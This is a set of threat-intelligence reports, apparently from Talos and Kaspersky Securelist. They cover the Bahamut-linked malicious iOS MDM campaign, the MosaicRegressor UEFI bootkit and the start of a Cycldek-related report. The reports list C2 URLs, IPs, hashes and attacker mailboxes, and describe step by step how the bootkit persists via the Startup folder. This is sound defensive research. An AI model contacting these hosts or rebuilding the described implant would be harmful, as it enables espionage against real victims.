\n\n\n[](<https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s1600/image7.png>)\n\n \nThe malware contains a similar list concerning the password field. \n \nFinally, the malicious browser contains three malicious plugins: \n\n\n * \"Add Bookmark\"\n * \"Add To Favourites\"\n * \"Add to Reading List\"\nThe purpose of the malicious extensions are very similar to the previous ones \u2014 it sends off stored data to the same C2 server as the other apps. \n \nIn the core and the plugins, the C2 server is encoded in base64 and encrypted in AES instead of DES. 
## Links with previous campaign

The Bahamut group was discovered and detailed by Bellingcat, an open-source news website. In that post, the author discussed Android-based malware with some similarities to the iOS malware we identified. That post kickstarted our investigation into any potential overlap between these campaigns and how they might be linked.

The new MDM platform we identified has similar victimology, with Middle Eastern targets, namely in Qatar, using a U.K. mobile number issued by LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign.

We identified an overlap in the domain voguextra[.]com, which was used by Bahamut within their "Devoted To Humanity" app to host an image file, and as the C2 server by the PrayTime iOS app mentioned in our first post. Bellingcat also reported that the domain had previously been used to host potential decoy documents, as detailed in VirusTotal [here](<https://www.virustotal.com/%23/url/a65bcd077ea0c098ae0bc88414a38f2cf4333cae40d704eb88dfa043819f70d7/details>), using hxxp://voguextra[.]com/decoy.doc.

The domains used during this campaign shared similarities with the domains used throughout the Bahamut campaign reported by Bellingcat. Most of the email addresses associated with the domains were [*@mail.ru](<mailto:*@mail.ru>) accounts, the C2s identified in both campaigns used AES-encrypted strings represented as base64 values, and the URI patterns used in both campaigns shared an almost identical syntax:

    repository + random.php + GET value
    /hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string]

The domain names also had a similar structure ([word]-[word]-[word]) across both campaigns. Actors tend to stick with similar structures, especially if they have had success in the past.

Once we started profiling the domains, we quickly noticed a strong link to India.
With access to historical whois and hosting information, we were able to determine that the three MDM domains pointed to an Indian nexus. All three domains were registered through a privacy proxy. However, the actor did not create nameservers upon registering the domains, which allowed us to discover that two of the three domains were registered with Indian registrars and hosting providers.

The three domains identified for MDM use were ios-update-whatsapp[.]com, ios-certificate-update[.]com and www[.]wpitcher[.]com.

**ios-update-whatsapp[.]com**

The nameserver used initially was obox.dns[.]com, which belongs to Directi, an India-based registrar. This later changed to [ns1-2].ios-update-whatsapp[.]com, which suggests this domain was potentially registered and purchased in India.

**wpitcher[.]com**

This domain, one of the original MDM domains we identified, initially used nameservers related to MantraGrid, an India-based cloud platform, which is another link to an Indian actor.

**ios-certificate-update[.]com**

This domain used a similar structure to ios-update-whatsapp[.]com and also shared the same privacy proxy as the other two domains listed above relating to the MDM activity. This was one of the first registered domains and was hosted on a bulletproof hosting platform in Panama.

Finally, Bellingcat, via Tom Lancaster, identified similarities with a previous InPage campaign reported by [Kaspersky](<https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/>), which shows similar URI structuring, as well as victimology. The InPage attack targeted Urdu-speaking Muslims, which further increases the likelihood that the victims are India-based, because Urdu is a dialect primarily spoken in India and Pakistan.
With our attacker, we identified that the MDM was also taking advantage of an application called PrayTime, a popular app for Muslims that alerts them to complete their daily prayers.

With all of this taken into consideration, we assess with moderate confidence that the attacker is located in India. Additionally, we assess with low confidence that the campaign we discovered is linked to the Bahamut group.

## Links with Windows-targeted campaigns

Talos identified several malicious binaries that could be used to target victims running Microsoft Windows operating systems, using the same infrastructure as the malicious app mentioned in our previous article: techwach[.]com.

The sample 6b62f4db64edf7edd648c38a563f44b656b0f6ad9a0e4e97f93cf9abfdfc63e5 contacts the following URL to download an additional payload:

 * hxxp://techwach[.]com/Beastwithtwobacks/Barkingupthewrongtree.php

We know that the MDM and the Windows services were up and running on the same C2 server in May 2018. The purpose of this malicious Windows binary is to collect information on the infected device (username and hostname), send it to the C2 server and retrieve an additional PE32 file if the operator judges the targeted system to be relevant.

We found additional similar samples between June 2017 and June 2018 with different C2 servers. The attackers have two kinds of samples: one developed in Delphi and one developed in VisualBasic.
Here are the Delphi samples:

 * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 -> hxxp://appswonder[.]info
 * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 -> hxxp://referfile[.]com
 * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed -> hxxp://hiltrox[.]com
 * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b -> hxxp://scrollayer[.]com
 * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 -> hxxp://twitck[.]com
 * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 -> hxxp://scrollayer[.]com

Here are the VisualBasic samples:

 * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d -> hxxp://32player[.]com
 * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 -> hxxp://nfinx[.]info
 * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea -> hxxp://metclix[.]com/
 * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 -> hxxp://appswonder[.]info/
 * ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 -> hxxp://capsnit[.]com/

Some of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matched the Apache setup of the malicious IPA apps.

Additionally, we identified the infection vector of one of the Windows malware samples. The attackers used a malicious RTF (a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4) abusing the CVE-2018-0802 vulnerability in order to drop and execute the last binary in the list above.
Finally, one of the VisualBasic binaries was bundled in an msiexec file with the following decoy document:

[](<https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s1600/image2.png>)

This decoy document uses a news story image from the India Today newspaper website ([here](<https://www.indiatoday.in/india/manipur/story/naga-peace-accord-nscn-im-muivah-greater-nagalim-967260-2017-03-23>)) describing the Naga peace accord. The Indian targets in this campaign are likely very interested in this topic.

## Conclusion

Since researching our original blog post, we have discovered that an actor has been operating these malicious MDMs for many years. Based on previous research regarding the Bahamut group and our own research, we believe the observed infrastructure is not limited to iOS targets, but is part of a broader framework that supports both Apple iOS and Windows platforms.

This actor is likely located in India, given the technical elements we observed. While the attacker's infrastructure throughout the entirety of the operation seems very similar to the one used by the Bahamut group, and they may even be connected, it is not possible to assert with high confidence that it is Bahamut at this time.

The use of a malicious MDM is convenient, and the system is well-documented. Given the effectiveness of MDM abuse, it's likely that well-funded actors will continue to move into this area.

Because enrollment into the MDM requires user interaction and acceptance, it is crucial that users are aware of this type of threat and the dangers it can pose to their data and privacy.

Talos will continue to keep an eye on MDM and similar infrastructures to ensure we are reporting the latest information and forcing the bad guys to innovate.

## Coverage

Additional ways our customers can detect and block this threat are listed below.
[](<https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s1600/image6.png>)

Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks.

[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection for all Cisco Security products.

[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).

## IOCs

iOS Applications

 * 422e4857614cc603f2388eb9a6b7bbe16d45b9fd0a9b752f02c107887cf8cb3e imo.ipa
 * e3ceec8676e2a1779b8289e341874209a448b11f3d81834a2faae9c494267602 Safari.ipa
 * bab7f61ed0f2b085c02ff1e4305ceab4479455d7b4cfba0a018b73ee955fcb51 Telegram.ipa
 * fbfaed75aa855c7db486edee15359b9f8c1b394b0b02f77b22500a90c53cb423 WhatsApp.ipa

MDM Domain:

 * ios-update-whatsapp[.]com

C2 Domains:

 * hytechmart[.]com

PE32 Samples and PE32 C2 servers: see the Delphi and VisualBasic sample lists in the "Links with Windows-targeted campaigns" section above.

Malicious RTF Samples:

 * a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4

Published: 2018-07-24T22:24:00 (modified 2018-07-25T11:53:23)
[Part II. Technical details (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/07080558/MosaicRegressor_Technical-details.pdf>)

UEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine's boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors seeking to carry out exceptionally persistent attacks.

One such attack has become the subject of our research, where we found a compromised UEFI firmware image that contained a malicious implant. This implant served as a means to deploy additional malware on the victim computers, malware that we hadn't come across before. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.

Throughout this blog we will elaborate on the following key findings:

 * We discovered rogue UEFI firmware images that were modified from their benign counterpart to incorporate several malicious modules;
 * The modules were used to drop malware on the victim machines.
This malware was part of a wider malicious framework that we dubbed MosaicRegressor;
 * Components from that framework were discovered in a series of targeted attacks pointed towards diplomats and members of an NGO from Africa, Asia and Europe, all showing ties in their activity to North Korea;
 * Code artefacts in some of the framework's components and overlaps in C&C infrastructure used during the campaign suggest that a Chinese-speaking actor is behind these attacks, possibly having connections to groups using the Winnti backdoor.

The attack was found with the help of [Firmware Scanner](<https://www.kaspersky.com/enterprise-security/wiki-section/products/anti-rootkit-and-remediation-technology>), which has been integrated into Kaspersky products since the beginning of 2019. This technology was developed specifically to detect threats hiding in the ROM BIOS, including UEFI firmware images.

## Current State of the Art

Before we dive deep into our findings, let us have a quick recap of what UEFI is and how it has been leveraged for attacks thus far. In a nutshell, UEFI is a specification that defines the structure and operation of low-level platform firmware, so as to allow the operating system to interact with it at various stages of its activity.

This interaction happens most notably during the boot phase, where UEFI firmware facilitates the loading of the operating system itself. That said, it can also occur when the OS is already up and running, for example in order to update the firmware through a well-defined software interface.

Considering the above, UEFI firmware makes for a perfect mechanism of persistent malware storage. A sophisticated attacker can modify the firmware in order to have it deploy malicious code that will be run after the operating system is loaded.
Moreover, since it is typically shipped within SPI flash storage that is soldered to the computer's motherboard, such implanted malware will be resistant to OS reinstallation or replacement of the hard drive.

This type of attack has occurred in several instances in the past few years. A prominent example is the LoJax implant [discovered](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>) by our friends at ESET in 2018, in which patched UEFI modules of the LoJack anti-theft software (also known as Computrace) were used to deploy a malicious user mode agent on a number of Sofacy / Fancy Bear victim machines. The dangers of Computrace itself [were described](<https://securelist.com/absolute-computrace-revisited/58278/>) by our colleagues from the Global Research and Analysis Team (GReAT) back in 2014.

Another example is the source code of a UEFI bootkit named VectorEDK, which was discovered in the Hacking Team leaks from 2015. This code consisted of a set of UEFI modules that could be incorporated into the platform firmware in order to have it deploy a backdoor to the system that runs when the OS loads, or redeploy it if it was wiped. Despite the fact that VectorEDK's code was made public and [can be found](<https://github.com/hackedteam/vector-edk>) on GitHub nowadays, we hadn't witnessed actual evidence of it in the wild before our latest finding.

## Our Discovery

During an investigation, we came across several suspicious UEFI firmware images. A deeper inspection revealed that they contained four components that had an unusual proximity in their assigned GUID values: two DXE drivers and two UEFI applications.
After further analysis we were able to determine that they were based on the leaked source code of Hacking Team's VectorEDK bootkit, with minor customizations.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png>)

**_Rogue components found within the compromised UEFI firmware_**

The goal of these added modules is to invoke a chain of events that results in writing a malicious executable named 'IntelUpdate.exe' to the victim's Startup folder. Thus, when Windows is started, the written malware is invoked as well. Apart from that, the modules ensure that if the malware file is removed from the disk, it will be rewritten. Since this logic is executed from the SPI flash, there is no way to avoid this process other than eliminating the malicious firmware.

Following is an outline of the components that we revealed:

 * **SmmInterfaceBase**: a DXE driver that is based on Hacking Team's 'rkloader' component and is intended to deploy further components of the bootkit for later execution. This is done by registering a callback that will be invoked upon an event of type EFI_EVENT_GROUP_READY_TO_BOOT. The event occurs at the point when control can be passed to the operating system's bootloader, effectively allowing the callback to take effect before it. The callback will in turn load and invoke the 'SmmAccessSub' component.
 * **Ntfs**: a driver written by Hacking Team that is used to detect and parse the NTFS file system in order to allow file and directory operations on the disk.
 * **SmmReset**: a UEFI application intended to mark the firmware image as infected. This is done by setting the value of a variable named 'fTA' to a hard-coded GUID.
The application is based on a component from the original Vector-EDK code base that is named 'ReSetfTA'.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png>)

**_Setting of the fTA variable with a predefined GUID to mark the execution of the bootkit_**

 * **SmmAccessSub**: the main bootkit component, which serves as a persistent dropper for user-mode malware. It is executed by the callback registered during the execution of 'SmmInterfaceBase', and takes care of writing a binary embedded within it as a file named 'IntelUpdate.exe' to the startup directory on disk. This allows the binary to execute when Windows is up and running.
This is the only proprietary component amongst the ones we inspected; it was mostly written from scratch and makes only slight use of code from a Vector-EDK application named 'fsbg'. It conducts the following actions to drop the intended file to disk:

 * Bootstraps pointers for the SystemTable, BootServices and RuntimeServices global structures.
 * Tries to get a handle to the currently loaded image by invoking the HandleProtocol method with the EFI_LOADED_IMAGE_PROTOCOL_GUID argument.
 * If the handle to the current image is obtained, the module attempts to find the root drive on which Windows is installed by enumerating all drives and checking that the '\Windows\System32' directory exists on them. A global EFI_FILE_PROTOCOL object that corresponds to the drive is created at this point and referenced to open any further directories or files on this drive.
 * If the root drive is found in the previous stage, the module looks for a marker file named 'setupinf.log' under the Windows directory and proceeds only if it doesn't exist.
In the absence of this file, it is created.
 * If the creation of 'setupinf.log' succeeds, the module goes on to check if the 'Users' directory exists under the same drive.
 * If the 'Users' directory exists, it writes the 'IntelUpdate.exe' file (embedded in the UEFI application's binary) under the 'ProgramData\Microsoft\Windows\Start Menu\Programs\Startup' directory in the root drive.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png>)

**_Code from 'SmmAccessSub' used to write the embedded 'IntelUpdate.exe' binary to the Windows Startup directory_**

Unfortunately, we were not able to determine the exact infection vector that allowed the attackers to overwrite the original UEFI firmware. Our detection logs show that the firmware itself was found to be malicious, but no suspicious events preceded it. Due to this, we can only speculate how the infection could have happened.

One option is through physical access to the victim's machine. This could be partially based on Hacking Team's leaked material, according to which the installation of firmware infected with VectorEDK requires booting the target machine from a USB key. Such a USB key would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well.

Furthermore, the leaks reveal that the UEFI infection capability (which is referred to by Hacking Team as 'persistent installation') was tested on ASUS X550C laptops. These make use of UEFI firmware by AMI which is very similar to the one we inspected.
For this reason we can assume that Hacking Team's method of patching the firmware would work in our case as well.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png>)

**_Excerpt from a Hacking Team manual for deployment of infected UEFI firmware, also known as 'persistent installation'_**

Of course, we cannot exclude other possibilities whereby rogue firmware was pushed remotely, perhaps through a compromised update mechanism. Such a scenario would typically require exploiting vulnerabilities in the BIOS update authentication process. While this could be the case, we don't have any evidence to support it.

## The Bigger Picture: Enter MosaicRegressor Framework

While Hacking Team's original bootkit was used to write one of the company's backdoors to disk, known as 'Soldier', 'Scout' or 'Elite', the UEFI implant we investigated deployed a new piece of malware that we hadn't seen before. We decided to look for similar samples that share strings and implementation traits with the dropped binary. The samples that we found suggested that the dropped malware was only one variant derived from a wider framework that we named MosaicRegressor.

MosaicRegressor is a multi-stage and modular framework aimed at espionage and data gathering. It consists of downloaders, and occasionally multiple intermediate loaders, that are intended to fetch and execute payloads on victim machines. The fact that the framework consists of multiple modules helps the attackers conceal the wider framework from analysis and deploy components to target machines only on demand. Indeed, we were able to obtain only a handful of payload components during our investigation.

The downloader components of MosaicRegressor share common business logic, whereby the implants contact a C&C, download further DLLs from it and then load and invoke specific export functions from them.
The execution of the downloaded modules usually results in output that can be in turn issued back to the C&C.\n\nHaving said that, the various downloaders we observed made use of different communication mechanisms when contacting their C&Cs:\n\n * CURL library (HTTP/HTTPS)\n * BITS transfer interface\n * WinHTTP API\n * POP3S/SMTPS/IMAPS, payloads transferred in e-mail messages\n\nThe last variant in the list is distinct for its use of e-mail boxes to host the requested payload. The payload intended to run by this implant can also generate an output upon invocation, which can be later forwarded to a 'feedback' mail address, where it will likely be collected by the attackers.\n\nThe mail boxes used for this purpose reside on the 'mail.ru' domain, and are accessed using credentials that are hard-coded in the malware's binary. To fetch the requested file from the target inbox, MailReg enters an infinite loop where it tries to connect to the "pop.mail.ru" server every 20 minutes, and makes use of the first pair of credentials that allow a successful connection. The e-mails used for login (without their passwords) and corresponding feedback mail are specified in the table below:\n\n**Login mail** | **Feedback mail** \n---|--- \nthtgoolnc@mail.ru | thgetmmun@mail.ru \nthbububugyhb85@mail.ru | thyhujubnmtt67@mail.ru \n \nThe downloaders can also be split in two distinct types, the "plain" one just fetching the payload, and the "extended" version that also collects system information:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png>)\n\n**_Structure of the log file written by BitsRegEx, strings marked in red are the original fields that appear in that file_**\n\nWe were able to obtain only one variant of the subsequent stage, that installs in the autorun registry values and acts as another loader for the components that are supposed to be fetched by the initial downloader. 
These components are also just intermediate loaders for the next-stage DLLs. Ultimately, there is no concrete business logic in the persistent components; it is provided by the C&C server in the form of DLL files, most of them temporary.\n\nWe have observed one such library, "**load.rem**", that is a basic document stealer, fetching files from the "Recent Documents" directory and archiving them with a password, likely as a preliminary step before another component exfiltrates the result to the C&C.\n\nThe following figure describes the full flow and the connections between the components that we know about. The colored elements are the components we obtained; the gray ones are those we didn't:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png>)\n\n**_Flow from BitsRegEx to execution of intermediate loaders and final payload_**\n\n## Who were the Targets?\n\nAccording to our telemetry, there were several dozen victims who received components from the MosaicRegressor framework between 2017 and 2019. These victims included diplomatic entities and NGOs in Africa, Asia and Europe. Only two of them were also infected with the UEFI bootkit in 2019, predating the deployment of the BitsReg component.\n\nBased on the affiliation of the discovered victims, we could determine that all had some connection to the DPRK, be it non-profit activity related to the country or an actual presence within it. This common theme is reinforced by one of the infection vectors used to deliver the malware to some of the victims: SFX archives pretending to be documents discussing various subjects related to North Korea. These were bundled with both an actual document and MosaicRegressor variants, both of which execute when the archive is opened. 
Examples for the lure documents can be seen below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png>)\n\n_**Examples of lure documents bundled to malicious SFX archives sent to MosaicRegressor victims, discussing DPRK related topics**_\n\n \n\n## Who is behind the attack?\n\nWhen analyzing MosaicRegressor's variants, we noticed several interesting artefacts that provided us with clues on the identity of the actor behind the framework. As far as we can tell, the attacks were conducted by a Chinese-speaking actor, who may have previously used the Winnti backdoor. We found the following evidence to support this:\n\n * We spotted many strings used in the system information log generated by the BitsRegEx variant that contain the character sequence '0xA3, 0xBA'. This is an invalid sequence for a UTF8 string and the LATIN1 encoding translates these symbols to a pound sign followed by a "masculine ordinal indicator" ("\u00a3\u00ba"). An attempt to iterate over all available iconv symbol tables, trying to convert the sequence to UTF-8, produces possible candidates that give a more meaningful interpretation. Given the context of the string preceding the symbol and line feed symbols following it, the best match is the "FULL-WIDTH COLON" Unicode character translated from either the Chinese or Korean code pages (i.e. 
CP936 and CP949).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png>)\n\n_Figure_: The BitsRegEx system information log making use of the character sequence 0xA3, 0xBA, likely used to represent a full-width colon, according to code pages CP936 and CP949.\n\n * Another artefact that we found was a file resource found in CurlReg samples that contained a language identifier set to 2052 ("zh-CN")\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png>)\n\n**_Chinese language artefact in the resource section of a CurlReg sample_**\n\n * We detected an OLE2 object taken out of a document armed with the CVE-2018-0802 vulnerability, which was produced by the so-called 'Royal Road' / '8.t' document builder and used to drop a CurlReg variant. To the best of our knowledge, this builder is commonly used by Chinese-speaking threat actors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png>)\n\n**_Excerpt from the OLE2 object found within a 'Royal Road' weaponized document, delivering the CurlReg variant_**\n\n * A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor's variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the 'Winnti umbrella and linked groups', according to a publicly available [report](<https://401trg.com/burning-umbrella/>). Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.\n\n## Conclusion\n\nThe attacks described in this blog post demonstrate the length an actor can go in order to gain the highest level of persistence on a victim machine. 
It is highly uncommon to see compromised UEFI firmware in the wild, usually due to the low visibility into attacks on firmware, the advanced measures required to deploy it on a target's SPI flash chip, and the high stakes of burning a sensitive toolset or assets when doing so.\n\nWith this in mind, we see that UEFI continues to be a point of interest to APT actors, while being largely overlooked by security vendors. The combination of our technology and our understanding of current and past campaigns leveraging infected firmware helps us monitor and report on future attacks against such targets.\n\nThe full details of this research, as well as future updates on the underlying threat actor, are available to customers of the APT reporting service through our Threat Intelligence Portal.\n\n## IoCs\n\nThe following IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. 
Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n**UEFI Modules **\n\nF5B320F7E87CC6F9D02E28350BB87DE6 (SmmInterfaceBase) \n0C136186858FD36080A7066657DE81F5 (SmmAccessSub) \n91A473D3711C28C3C563284DFAFE926B (SmmReset) \nDD8D3718197A10097CD72A94ED223238 (Ntfs)\n\n**RAR SFX droppers**\n\n0EFB785C75C3030C438698C77F6E960E \n12B5FED367DB92475B071B6D622E44CD \n3B3BC0A2772641D2FC2E7CBC6DDA33EC \n3B58E122D9E17121416B146DAAB4DB9D \n70DEF87D180616406E010051ED773749 \n7908B9935479081A6E0F681CCEF2FDD9 \nAE66ED2276336668E793B167B6950040 \nB23E1FE87AE049F46180091D643C0201 \nCFB072D1B50425FF162F02846ED263F9\n\n**Decoy documents**\n\n0D386EBBA1CCF1758A19FB0B25451AFE \n233B300A58D5236C355AFD373DABC48B \n449BE89F939F5F909734C0E74A0B9751 \n67CF741E627986E97293A8F38DE492A7 \n6E949601EBDD5D50707C0AF7D3F3C7A5 \n92F6C00DA977110200B5A3359F5E1462 \nA69205984849744C39CFB421D8E97B1F \nD197648A3FB0D8FF6318DB922552E49E\n\n**BitsReg**\n\nB53880397D331C6FE3493A9EF81CD76E \nAFC09DEB7B205EADAE4268F954444984 (64-bit)\n\n**BitsRegEx**\n\nDC14EE862DDA3BCC0D2445FDCB3EE5AE \n88750B4A3C5E80FD82CF0DD534903FC0 \nC63D3C25ABD49EE131004E6401AF856C \nD273CD2B96E78DEF437D9C1E37155E00 \n72C514C0B96E3A31F6F1A85D8F28403C\n\n**CurlReg**\n\n9E182D30B070BB14A8922CFF4837B94D \n61B4E0B1F14D93D7B176981964388291 \n3D2835C35BA789BD86620F98CBFBF08B\n\n**CurlRegEx**\n\n328AD6468F6EDB80B3ABF97AC39A0721 \n7B213A6CE7AB30A62E84D81D455B4DEA\n\n**MailReg**\n\nE2F4914E38BB632E975CFF14C39D8DCD\n\n**WinHTTP Based Downloaders**\n\n08ECD8068617C86D7E3A3E810B106DCE \n1732357D3A0081A87D56EE1AE8B4D205 \n74DB88B890054259D2F16FF22C79144D \n7C3C4C4E7273C10DBBAB628F6B2336D8\n\n**BitsReg Payload (FileA.z)**\n\n89527F932188BD73572E2974F4344D46\n\n**2nd Stage Loaders**\n\n36B51D2C0D8F48A7DC834F4B9E477238 (mapisp.dll) \n1C5377A54CBAA1B86279F63EE226B1DF (cryptui.sep) \n9F13636D5861066835ED5A79819AAC28 (cryptui.sep)\n\n**3rd Stage Payload**\n\nFA0A874926453E452E3B6CED045D2206 (load.rem)\n\n**File 
paths**\n\n%APPDATA%\\Microsoft\\Credentials\\MSI36C2.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\%Computername%.dat \n%APPDATA%\\Microsoft\\Internet Explorer\\FileA.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileB.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileC.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileD.dll \n%APPDATA%\\Microsoft\\Internet Explorer\\FileOutA.dat \n%APPDATA%\\Microsoft\\Network\\DFileA.dll \n%APPDATA%\\Microsoft\\Network\\DFileC.dll \n%APPDATA%\\Microsoft\\Network\\DFileD.dll \n%APPDATA%\\Microsoft\\Network\\subst.sep \n%APPDATA%\\Microsoft\\WebA.dll \n%APPDATA%\\Microsoft\\WebB.dll \n%APPDATA%\\Microsoft\\WebC.dll \n%APPDATA%\\Microsoft\\Windows\\LnkClass.dat \n%APPDATA%\\Microsoft\\Windows\\SendTo\\cryptui.sep \n%APPDATA%\\Microsoft\\Windows\\SendTo\\load.dll %APPDATA%\\Microsoft\\Windows\\load.rem \n%APPDATA%\\Microsoft\\Windows\\mapisp.dll \n%APPDATA%\\Microsoft\\exitUI.rs \n%APPDATA%\\Microsoft\\sppsvc.tbl \n%APPDATA%\\Microsoft\\subst.tbl \n%APPDATA%\\newplgs.dll \n%APPDATA%\\rfvtgb.dll \n%APPDATA%\\sdfcvb.dll \n%APPDATA%\\msreg.dll \n%APPDATA\\Microsoft\\dfsadu.dll \n%COMMON_APPDATA%\\Microsoft\\Windows\\user.rem \n%TEMP%\\BeFileA.dll \n%TEMP%\\BeFileC.dll \n%TEMP%\\RepairA.dll \n%TEMP%\\RepairB.dll \n%TEMP%\\RepairC.dll \n%TEMP%\\RepairD.dll \n%TEMP%\\wrtreg_32.dll \n%TEMP%\\wrtreg_64.dll \n%appdata%\\dwhost.exe \n%appdata%\\msreg.exe \n%appdata%\\return.exe \n%appdata%\\winword.exe\n\n**Domains and IPs**\n\n103.195.150[.]106 \n103.229.1[.]26 \n103.243.24[.]171 \n103.243.26[.]211 \n103.30.40[.]116 \n103.30.40[.]39 \n103.39.109[.]239 \n103.39.109[.]252 \n103.39.110[.]193 \n103.56.115[.]69 \n103.82.52[.]18 \n117.18.4[.]6 \n144.48.241[.]167 \n144.48.241[.]32 \n150.129.81[.]21 \n43.252.228[.]179 \n43.252.228[.]252 \n43.252.228[.]75 \n43.252.228[.]84 \n43.252.230[.]180 \nmenjitghyukl.myfirewall[.]org\n\n**Additional Suspected C&Cs**\n\n43.252.230[.]173 \n185.216.117[.]91 \n103.215.82[.]161 \n103.96.72[.]148 
\n122.10.82[.]30\n\n**Mutexes**\n\nFindFirstFile Message Bi \nset instance state \nforegrounduu state \nsingle UI \nOffice Module \nprocess attach Module\n\n_Source: "MosaicRegressor: Lurking in the Shadows of UEFI", Securelist, published 2020-10-05, <https://securelist.com/mosaicregressor/98849/>_\n\n**The leap of a Cycldek-related threat actor** (Securelist, published 2021-04-05)\n\n## Introduction\n\nIn the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [sideloaded](<https://attack.mitre.org/techniques/T1574/002/>) by it, and an encoded payload, generally dropped from a self-extracting archive. Initially considered to be the signature of LuckyMouse, the triad has since been observed in use by other groups, such as HoneyMyte. While this means that attacks cannot be attributed on the basis of this technique alone, it also follows that efficient detection of such triads reveals more and more malicious activity.\n\nThe investigation described in this article started with one such file, which caught our attention due to the various improvements it brought to this well-known infection vector.\n\n## FoundCore Loader\n\nThis malware sample was discovered in the context of an attack against a high-profile organization located in Vietnam. 
